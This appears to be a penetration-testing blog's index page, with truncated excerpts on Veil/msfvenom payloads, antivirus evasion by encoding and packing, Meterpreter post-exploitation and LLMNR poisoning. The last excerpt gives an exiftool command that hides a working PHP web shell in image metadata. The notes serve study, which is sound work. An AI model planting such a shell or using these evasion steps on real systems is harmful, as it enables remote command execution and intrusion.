Hey, KEEP CALM and hack away…
Table of Contents Msfvenom Packer Veil References Msfvenom Link to Msfvenom. Use with multiple encoders to evade detection. Packer Install upx to pack the executable. Here is a link to PolyPack Project which talks about packing in more detail. Veil For MeterHTTPSContained payload ./Veil.py use 20 set LHOST <ip> set LPORT <port> generate use the…
Table of Contents Extracting the Password Hashes Pass the Hash Capturing Key Strokes Token Impersonation Pivoting Through Sub-network Meterpreter Scripts Migrating to a Process Killing Antivirus Software Obtaining System Password Hashes Viewing All Traffic on a Target Machine Scraping a System Using Persistence Leveraging Post Exploitation Modules Upgrading Your Command Shell to Meterpreter Manipulating Windows…
Table of Contents The Concept LLMNR Related Attacks LLMNR/NBT-NS Poisoning Responder How It Works – The Source Code Initialization packet.py Servers Folder The Main Function LLMNR.py Check By Doing Analyze Network Traffic What If I Turn Off the MDNS Poisoner? Conclusion References This is the first article of my Active Directory Series. I’ll be reading…
Table of Contents The Intention Place to Start The Template Be Creative The Prototype The Real Request Next Steps References The really interesting thing begins right here right now. I am going to dig into metasploit, and try to write a simple metasploit module from scratch. The Intention The intention of doing this is to…
Table of Contents Disclaimer Passive Recon BuiltWith Shodan.io Censys.io Hunter.io Summary Disclaimer Anything here on my blog, this article, and all the other one, are for education purpose. Any misuse of the information is at your own risk. 声明 此博客任何文章,包括本篇,仅供学习使用。任何滥用信息的行为,作者概不负责。 What Perter Kim (author of THP) suggests is to get your hands dirty. And the…
Table of Contents Web Application Exploitation SQL Injection (SQLi) Crosssite Scripting (XSS) Cross-site Request Forgery (CSRF) Session Token Entropy Fuzzing/Input validation Business Logic Summary Web Application Exploitation First things first, two good resources for webapp pentest. OWASP WebApp Testing Guid The Web Application Hacker’s Handbook SQL Injection (SQLi) TODO Read more about SQL database, how…
Table of Contents General Idea The Mentality Thing The Difference Wthin Responsibility Engagement Time Section II – The Drive – Exploiting Scanner Findings About Payloads DEP and ASLR DEP ASLR Take Aways General Idea This is going to be a notes taking article upon reading the book The Hacker Play Book I. I will stop…
Set up 目标机器在 10.10.10.169 Recon Nmap # Nmap 7.80 scan initiated Wed Apr 29 23:11:13 2020 as: nmap -A -T4 -p- -v -oN nmap.txt 10.10.10.169 Increasing send delay for 10.10.10.169 from 0 to 5 due to 60 out of 149 dropped probes since last increase. Increasing send delay for 10.10.10.169 from 5 to 10 due…
问题描述 运行 msfconsole,即报如下警告信息: ➜ recon msfconsole /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil 警告信息会在使用过程中一直出现,扰乱阅读。 解决方法 打开 /opt/metasploit/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb 文件,找到 84 行,将 if config =~ SIMPLE_INT" 改成 if…
Table of Contens Hide Code in Pictures Hide Code in Pictures exiftool -DocumentName="<h1>TEST<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" <pic.[jpg|jpeg|png|gig]>